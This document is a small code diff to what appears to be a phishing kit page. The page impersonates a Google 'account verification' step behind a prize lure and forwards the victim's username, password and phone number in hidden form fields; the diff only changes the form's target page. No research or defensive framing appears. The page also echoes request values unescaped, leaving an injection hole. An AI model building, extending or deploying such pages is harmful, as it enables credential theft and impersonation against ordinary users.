--- a/login/google/google.html
+++ b/login/google/google.html
@@ -41,7 +41,7 @@ $phone = $_GET['phone'];
 <div class="txt-season">ACCOUNT VERIFICATION<br> <small>VERIFY YOUR ACCOUNT BEFORE RECEIVE YOUR SELECTED PRIZE</small></div>
 
 <center>
-<form action="completed.php" method="get">
+<form action="completed.html" method="get">
 <input type="hidden" name="username" value="<?php echo $username;?>" readonly>
 <input type="hidden" name="password" value="<?php echo $password;?>" readonly>
 <input type="hidden" name="phone" value="<?php echo $phone;?>" readonly>
